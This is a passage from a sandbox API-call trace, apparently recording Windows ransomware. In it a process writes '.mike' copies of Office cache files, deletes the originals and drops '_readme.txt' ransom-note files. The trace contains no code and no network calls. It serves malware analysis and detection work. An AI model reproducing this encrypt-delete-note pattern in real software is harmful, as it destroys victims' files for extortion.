users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.247] GetFileType (hFile=0x264) returned 0x1 [0041.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.247] GetFileType (hFile=0x264) returned 0x1 [0041.247] WriteFile (in: hFile=0x264, lpBuffer=0x20f7de4*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x20f7de4*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.248] CloseHandle (hObject=0x264) returned 1 [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpFilePart=0x0) returned 0x4a [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpFilePart=0x0) returned 0x4b [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpFilePart=0x0) returned 0x4c [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.248] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.249] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.249] GetFileType (hFile=0x264) returned 0x1 [0041.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.249] GetFileType (hFile=0x264) returned 0x1 [0041.249] CloseHandle (hObject=0x264) returned 1 [0041.249] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.249] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.249] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.249] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.250] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21002dc | out: lpFileInformation=0x21002dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5)) returned 1 [0041.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.250] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2100610 | out: lpFileInformation=0x2100610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5)) returned 1 [0041.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0041.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.250] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.250] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.251] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0041.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.251] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.251] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike", lpFilePart=0x0) returned 0x51 [0041.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.251] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.251] GetFileType (hFile=0x264) returned 0x1 [0041.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.251] GetFileType (hFile=0x264) returned 0x1 [0041.251] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.251] WriteFile (in: hFile=0x264, lpBuffer=0x2101524*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2101524*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.252] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2101004 | out: lpFileInformation=0x2101004*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5)) returned 1 [0041.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.252] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpFilePart=0x0) returned 0x4c [0041.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.252] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.253] GetFileType (hFile=0x264) returned 0x1 [0041.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.253] GetFileType (hFile=0x264) returned 0x1 [0041.253] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.253] ReadFile (in: hFile=0x264, lpBuffer=0x210265c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x210265c*, lpNumberOfBytesRead=0x2af110*=0x15b5, lpOverlapped=0x0) returned 1 [0041.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.255] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.255] GetFileType (hFile=0x264) returned 0x1 [0041.255] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.255] GetFileType (hFile=0x264) returned 0x1 [0041.255] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.256] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.256] GetFileType (hFile=0x264) returned 0x1 [0041.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.256] GetFileType (hFile=0x264) returned 0x1 [0041.257] WriteFile (in: hFile=0x264, lpBuffer=0x210f9a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x210f9a8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.257] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", dwFileAttributes=0x80) returned 1 [0041.257] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0041.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.258] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.259] GetFileType (hFile=0x264) returned 0x1 [0041.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.259] GetFileType (hFile=0x264) returned 0x1 [0041.259] WriteFile (in: hFile=0x264, lpBuffer=0x2112e78*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2112e78*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.260] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.261] GetFileType (hFile=0x264) returned 0x1 [0041.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.261] GetFileType (hFile=0x264) returned 0x1 [0041.261] CloseHandle (hObject=0x264) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.261] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x211703c | out: lpFileInformation=0x211703c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.261] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2117380 | out: lpFileInformation=0x2117380*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.262] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.262] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.262] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.262] GetFileType (hFile=0x264) returned 0x1 [0041.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.262] GetFileType (hFile=0x264) returned 0x1 [0041.262] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.263] WriteFile (in: hFile=0x264, lpBuffer=0x2118308*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2118308*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.263] CloseHandle (hObject=0x264) returned 1 [0041.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.264] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2117dc8 | out: lpFileInformation=0x2117dc8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.264] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.264] GetFileType (hFile=0x264) returned 0x1 [0041.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.264] GetFileType (hFile=0x264) returned 0x1 [0041.264] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.264] ReadFile (in: hFile=0x264, lpBuffer=0x211944c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x211944c*, lpNumberOfBytesRead=0x2af110*=0x333, lpOverlapped=0x0) returned 1 [0041.265] CloseHandle (hObject=0x264) returned 1 [0041.266] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.266] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.266] GetFileType (hFile=0x264) returned 0x1 [0041.266] 